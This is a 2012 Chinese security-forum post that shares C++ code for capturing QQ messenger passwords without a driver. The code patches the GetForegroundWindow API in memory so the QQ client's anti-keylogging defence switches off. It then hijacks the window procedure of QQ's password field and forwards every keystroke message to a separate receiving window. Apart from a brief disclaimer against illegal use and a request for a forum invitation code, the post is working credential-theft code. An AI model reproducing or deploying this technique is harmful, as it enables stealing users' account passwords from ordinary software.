-
-
[旧帖]
[原创]不加载驱动截取QQ密码
0.00雪花
-
发表于:
2012-11-6 19:27
1754
-
[旧帖] [原创]不加载驱动截取QQ密码
0.00雪花
直接看代码吧。
菜鸟不怎么会说话。
希望版主给我一个邀请码。
还有切勿用于非法行为。如有者。于本人无关。
[HIDE]
/*
* 修改GetForegroundWindow函数,使得QQ进程不能得知自己成为前台窗口,这样就不会发送干扰输入了;同时修改密码窗口的窗口过程,以便监听
*/
BOOL CalePatchAddr()
{
FARPROC FuncAddr = GetProcAddress(GetModuleHandle(_T("USER32.DLL")), "GetForegroundWindow");
byte HookCode[] = {0xC3/*ret*/, 0x90/*nop*/, 0x90, 0x90, 0x90};
LPVOID CodeAddr = VirtualAlloc(0, 5, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(CodeAddr, HookCode, 5);
ULONG oData;
VirtualProtect(FuncAddr, 5, PAGE_EXECUTE_READWRITE, &oData);
byte NewCode[] = { 0xE9 /*jmp*/, 0, 0, 0, 0 };
DWORD off = (DWORD)CodeAddr - (DWORD)FuncAddr - 5;
memcpy(&NewCode[1], &off, 4);
memcpy(FuncAddr, NewCode, 5);
return TRUE;
}
WNDPROC pswd_proc = NULL;
HWND recv_hwnd = NULL;
LRESULT CALLBACK WndProc2(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
SendMessage((HWND)recv_hwnd, message, wParam, lParam);
return ::CallWindowProc(pswd_proc, hWnd, message, wParam, lParam);
}
void InstallHook()
{
HWND QQ_hwnd = ::FindWindow(_T("TXGuiFoundation"), _T("QQ2012"));
if (QQ_hwnd == NULL)
{
AfxMessageBox(_T("QQ not found!"));
return;
}
HWND pswd_hwnd = FindWindowEx(QQ_hwnd, 0, _T("Edit"), 0); //: MsgBox hwnd_qq_psw
if (pswd_hwnd == NULL)
{
AfxMessageBox(_T("pswd HWND not found!"));
return;
}
pswd_proc = reinterpret_cast<WNDPROC>(GetWindowLong(pswd_hwnd, GWL_WNDPROC));
long ret = SetWindowLong(pswd_hwnd, GWL_WNDPROC, (long)WndProc2);
}、
[/HIDE]
[课程]Android-CTF解题方法汇总!